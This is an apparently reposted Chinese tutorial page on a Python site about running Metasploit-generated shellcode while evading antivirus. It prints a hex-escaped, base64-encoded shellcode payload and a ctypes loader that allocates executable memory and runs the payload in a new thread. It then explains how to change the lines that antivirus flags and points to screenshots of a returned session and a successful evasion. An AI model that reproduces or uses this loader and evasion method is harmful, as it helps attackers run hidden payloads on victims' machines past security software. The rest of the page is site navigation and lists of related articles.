首页
所有分类
TAGS
文字工具 EMOJI BIBLE
编程 Python

通过Python实现Payload分离免杀过程详解

Posted in Python onJuly 13, 2020

缺点:

编译成exe以后体积过大

实现:

msf生成shellcode代码:

通过Python实现Payload分离免杀过程详解

将payload给copy下来,去除引号。

\x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42
\x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\x69\x33
\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x72\x44\x78\x68\x66
\x41\x49\x73\x49\x4d\x48\x50\x44\x51\x48\x48\x34\x76\x4a\x53
\x56\x34\x74\x53\x45\x49\x74\x4b\x50\x49\x74\x4d\x45\x58\x6a
\x6a\x53\x41\x48\x52\x55\x59\x74\x5a\x49\x41\x48\x54\x69\x30
\x6b\x59\x34\x7a\x70\x4a\x69\x7a\x53\x4c\x41\x64\x59\x78\x2f
\x36\x7a\x42\x7a\x77\x30\x42\x78\x7a\x6a\x67\x64\x66\x59\x44
\x66\x66\x67\x37\x66\x53\x52\x31\x35\x46\x69\x4c\x57\x43\x51
\x42\x30\x32\x61\x4c\x44\x45\x75\x4c\x57\x42\x77\x42\x30\x34
\x73\x45\x69\x77\x48\x51\x69\x55\x51\x6b\x4a\x46\x74\x62\x59
\x56\x6c\x61\x55\x66\x2f\x67\x58\x31\x39\x61\x69\x78\x4c\x72
\x6a\x56\x31\x6f\x4d\x7a\x49\x41\x41\x47\x68\x33\x63\x7a\x4a
\x66\x56\x47\x68\x4d\x64\x79\x59\x48\x69\x65\x6a\x2f\x30\x4c
\x69\x51\x41\x51\x41\x41\x4b\x63\x52\x55\x55\x47\x67\x70\x67
\x47\x73\x41\x2f\x39\x56\x71\x43\x6d\x6a\x41\x71\x41\x4d\x38
\x61\x41\x49\x41\x44\x51\x57\x4a\x35\x6c\x42\x51\x55\x46\x42
\x41\x55\x45\x42\x51\x61\x4f\x6f\x50\x33\x2b\x44\x2f\x31\x5a
\x64\x71\x45\x46\x5a\x58\x61\x4a\x6d\x6c\x64\x47\x48\x2f\x31
\x59\x58\x41\x64\x41\x72\x2f\x54\x67\x68\x31\x37\x4f\x68\x6e
\x41\x41\x41\x41\x61\x67\x42\x71\x42\x46\x5a\x58\x61\x41\x4c
\x5a\x79\x46\x2f\x2f\x31\x59\x50\x34\x41\x48\x34\x32\x69\x7a
\x5a\x71\x51\x47\x67\x41\x45\x41\x41\x41\x56\x6d\x6f\x41\x61
\x46\x69\x6b\x55\x2b\x58\x2f\x31\x5a\x4e\x54\x61\x67\x42\x57
\x55\x31\x64\x6f\x41\x74\x6e\x49\x58\x2f\x2f\x56\x67\x2f\x67
\x41\x66\x53\x68\x59\x61\x41\x42\x41\x41\x41\x42\x71\x41\x46
\x42\x6f\x43\x79\x38\x50\x4d\x50\x2f\x56\x56\x32\x68\x31\x62
\x6b\x31\x68\x2f\x39\x56\x65\x58\x76\x38\x4d\x4a\x41\x2b\x46
\x63\x50\x2f\x2f\x2f\x2b\x6d\x62\x2f\x2f\x2f\x2f\x41\x63\x4d
\x70\x78\x6e\x58\x42\x77\x37\x76\x77\x74\x61\x4a\x57\x61\x67
\x42\x54\x2f\x39\x55\x3d

将自己的代码放入第3行的shell_code位置。

import ctypes,base64
 
encode_shellcode = "shell_code"
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

以上代码是绝对会被查杀的,但是可以通过修改代码绕过。思路如下,先查找杀软查杀哪里,再修改杀软查杀的代码,同时保证正常运行。提示一下,查杀的代码再5-6行之间,对其进行修改即可。

返回session:

通过Python实现Payload分离免杀过程详解

免杀效果:

通过Python实现Payload分离免杀过程详解

参考资料:

https://github.com/TideSec/BypassAntiVirus

https://micro8.gitbook.io/micro8/

以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持三水点靠木。

通过Python实现Payload分离免杀过程详解

- Author -

返回主页aptkekeo

声明:登载此文出于传递更多信息之目的,并不意味着赞同其观点或证实其描述。

Python 相关文章推荐
python 文件与目录操作
Dec 24 Python
Python中用altzone()方法处理时区的教程
May 22 Python
简单理解Python中的装饰器
Jul 31 Python
python删除服务器文件代码示例
Feb 09 Python
Python 脚本获取ES 存储容量的实例
Dec 27 Python
wxpython多线程防假死与线程间传递消息实例详解
Dec 13 Python
python实现名片管理器的示例代码
Dec 17 Python
详解用Pytest+Allure生成漂亮的HTML图形化测试报告
Mar 31 Python
Python使用OpenPyXL处理Excel表格
Jul 02 Python
Python 创建TCP服务器的方法
Jul 28 Python
python代数式括号有效性检验示例代码
Oct 04 Python
Python - 10行代码集2000张美女图
May 23 Python
python上selenium的弹框操作实现
Jul 13 #Python
python如何导入依赖包
Jul 13 #Python
python入门:argparse浅析 nargs='+'作用
Jul 12 #Python
浅谈Python 命令行参数argparse写入图片路径操作
Jul 12 #Python
Python实现封装打包自己写的代码,被python import
Jul 12 #Python
Django封装交互接口代码
Jul 12 #Python
在django中实现choices字段获取对应字段值
Jul 12 #Python
动静分离(1) reload(1) 反向代理(2) shell(3) 负载均衡(6) Telnet(1) 生成缩略图(1) 防盗链(1) http(6) https(7)
You might like
php中支持多种编码的中文字符串截取函数!
2007/03/20 PHP
详解php中反射的应用
2016/03/15 PHP
laravel中Redis队列监听中断的分析
2020/09/14 PHP
laravel与thinkphp之间的区别与优缺点
2021/03/02 PHP
WordPress 插件——CoolCode使用方法与下载
2007/07/02 Javascript
offsetParent 算法分析
2010/04/05 Javascript
jQuery 打造动态渐变按钮 详细图文教程
2010/04/25 Javascript
jquery更换文章内容与改变字体大小代码
2013/09/30 Javascript
使用jquery 简单实现下拉菜单
2015/01/14 Javascript
详解前端构建工具gulpjs的使用介绍及技巧
2017/01/19 Javascript
AngularJS解决ng-if中的ng-model值无效的问题
2017/06/21 Javascript
vue-cli 打包使用history模式的后端配置实例
2018/09/20 Javascript
webpack中的模式(mode)使用详解
2020/02/20 Javascript
vue 组件间的通信之子组件向父组件传值的方式
2020/07/29 Javascript
python 算法 排序实现快速排序
2012/06/05 Python
Python实现的单向循环链表功能示例
2017/11/10 Python
python如何使用unittest测试接口
2018/04/04 Python
Python绘制3D图形
2018/05/03 Python
使用python对文件中的数值进行累加的实例
2018/11/28 Python
Python3最长回文子串算法示例
2019/03/04 Python
PyQt5的安装配置过程,将ui文件转为py文件后显示窗口的实例
2019/06/19 Python
python设计微型小说网站(基于Django+Bootstrap框架)
2019/07/08 Python
使用python实现kNN分类算法
2019/10/16 Python
win10下python2和python3共存问题解决方法
2019/12/23 Python
JetBrains PyCharm(Community版本)的下载、安装和初步使用图文教程详解
2020/03/19 Python
利用Python如何实时检测自身内存占用
2020/05/09 Python
中国医药集团国药在线:国药网
2017/02/06 全球购物
Sql面试题
2013/03/20 面试题
酷瑞网络科技面试题
2012/03/30 面试题
物理学专业自荐信
2014/06/11 职场文书
白酒营销策划方案
2014/08/17 职场文书
优秀教育工作者事迹材料
2014/12/24 职场文书
个人先进事迹总结
2015/02/26 职场文书
大学生暑期实践报告之企业经营管理
2019/08/08 职场文书
python glom模块的使用简介
2021/04/13 Python
Python数据可视化之用Matplotlib绘制常用图形
2021/06/03 Python